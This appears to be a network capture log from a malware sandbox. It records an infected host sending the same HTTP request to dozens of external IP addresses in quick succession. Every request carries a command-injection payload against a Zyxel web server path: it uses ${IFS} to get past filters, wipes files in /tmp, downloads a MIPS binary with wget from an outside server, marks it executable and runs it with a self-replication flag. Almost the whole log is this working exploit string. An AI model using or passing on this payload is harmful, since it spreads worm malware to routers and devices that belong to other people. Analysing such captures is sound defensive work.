                                                        Feb 2, 2024 06:21:05.852494955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3350192.168.2.1437198182.61.232.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.852533102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3351192.168.2.143433042.111.6.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.852566957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3352192.168.2.1458442197.222.110.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.852596998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3353192.168.2.1441820147.80.16.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.852653027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3354192.168.2.1452514137.7.123.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.852694988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3355192.168.2.144040612.178.233.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.852711916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3356192.168.2.1439432172.173.55.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.852751970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3357192.168.2.1435088157.84.230.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.852793932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3358192.168.2.1440122102.178.80.238443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.852833986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3359192.168.2.1443260188.107.122.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.852875948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3360192.168.2.1444576208.101.88.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.852921963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3361192.168.2.1446450219.54.155.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.852962017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3362192.168.2.146006468.53.162.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.853005886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3363192.168.2.1459072136.184.64.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.853034973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3364192.168.2.1457006193.148.227.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.853092909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3365192.168.2.1457726119.89.26.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.853146076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3366192.168.2.144889854.207.244.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.853190899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3367192.168.2.1439220108.177.65.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.853218079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3368192.168.2.1443686198.211.204.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.853266954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3369192.168.2.1444534139.89.71.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.853315115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3370192.168.2.143647899.70.135.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.853355885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3371192.168.2.144637271.11.118.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.853370905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3372192.168.2.14351264.138.167.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.853430986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3373192.168.2.1446830174.2.125.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.853477001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3374192.168.2.1437580154.30.114.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.853503942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3375192.168.2.143368661.162.199.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.853547096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3376192.168.2.144735470.21.249.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.853593111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3377192.168.2.1453660202.64.83.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.853630066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3378192.168.2.144880492.132.99.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.853653908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3379192.168.2.144711054.22.27.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.853691101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3380192.168.2.143311263.66.126.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.853720903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3381192.168.2.1438482217.187.53.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.853770018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3382192.168.2.145132017.130.246.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.853805065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3383192.168.2.1442062151.132.247.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.853847027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3384192.168.2.144780632.214.54.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.853897095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3385192.168.2.1437338119.17.73.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.853945971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3386192.168.2.145279483.145.184.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.853970051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3387192.168.2.1433156211.70.40.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.854002953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3388192.168.2.1455738135.241.177.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.854026079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3389192.168.2.143438088.166.214.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.854082108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3390192.168.2.145376481.123.151.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.854110003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3391192.168.2.143783652.114.91.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.854176998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3392192.168.2.1434606140.202.216.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.854201078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3393192.168.2.1453270104.145.17.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.854245901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3394192.168.2.144430278.52.123.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.854283094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3395192.168.2.1447692154.106.193.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.854341030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3396192.168.2.1450730176.202.125.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.854371071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3397192.168.2.143925436.198.169.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.854413986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3398192.168.2.1444326178.252.178.220443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.854454041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3399192.168.2.1444244154.15.244.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.854484081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3400192.168.2.144178231.97.250.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.854520082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3401192.168.2.1455988174.32.152.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.854557037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3402192.168.2.144746268.14.66.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.854592085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3403192.168.2.1456576150.138.231.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.854628086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3404192.168.2.1439800167.126.196.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.854674101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3405192.168.2.1456594164.24.201.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.854697943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3406192.168.2.1446650220.230.189.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.854738951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3407192.168.2.1443462112.69.168.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.854782104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3408192.168.2.1444440204.34.229.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.854826927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3409192.168.2.1456206177.130.179.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.854873896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3410192.168.2.144327244.109.68.67443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.854917049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3411192.168.2.144157053.10.190.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.854958057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3412192.168.2.145935041.254.8.191443
                                                        TimestampBytes transferredDirectionData
